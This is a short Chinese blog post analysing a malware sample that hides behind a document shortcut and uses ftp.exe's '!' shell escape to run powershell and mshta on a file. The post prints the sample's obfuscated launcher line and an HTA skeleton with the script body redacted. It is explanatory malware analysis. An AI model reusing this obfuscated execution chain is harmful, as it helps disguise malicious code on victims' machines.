调用ftp.exe执行系统命令,不是太新奇的技术,可以不必大惊小怪。

在看雪论坛看到使用FTP执行恶意代码的病毒样本。ftp -s:filename指定包含FTP命令的文本文件,使用!号是转义到shell。

调用ftp.exe执行命令

伪装快捷方式执行命令

样本伪装的文档快捷方式调用ftp.exe进行执行命令。而调用的恶意代码是隐写到文档里的,开头用ftp执行了内置的!转到shell执行了powershell.exe mshta.exe ccc.dat这条命令,用powershell.exe运行mshta.exe执行了ccc.dat里面的vbscript脚本。然后从ccc.dat中释放出一个正常的drc.docx文档到C:\ProgramData\drc.docx并且打开。

ftp -s:ccc.dat

调用ftp.exe执行命令

ccc.dat


! %ProgramData:~3,1%%ProgramData:~5,1%wer%windir:~-1,1%hell.exe m%windir:~-1,1%hta.exe '%cd%\ccc.dat'

<!DOCTYPE html>
<html>
<head>
<HTA:APPLICATION icon="#" WINDOWSTATE="minimize" SHOWINTASKBAR="no" SYSMENU="no"  CAPTION="no" />
<script type="text/vbscript">

XXXXX

</script>
</head>
<body>
</body>
</html>

参考

https://mp.weixin.qq.com/s/SXbQ_-Ik13m66rppxls9bw

相关文章:

  • 2021-08-23
  • 2021-11-14
  • 2022-12-23
  • 2022-02-27
猜你喜欢
  • 2021-11-22
  • 2021-06-01
  • 2022-12-23
  • 2021-06-17
  • 2021-06-23
  • 2022-12-23
  • 2021-10-31
相关资源
相似解决方案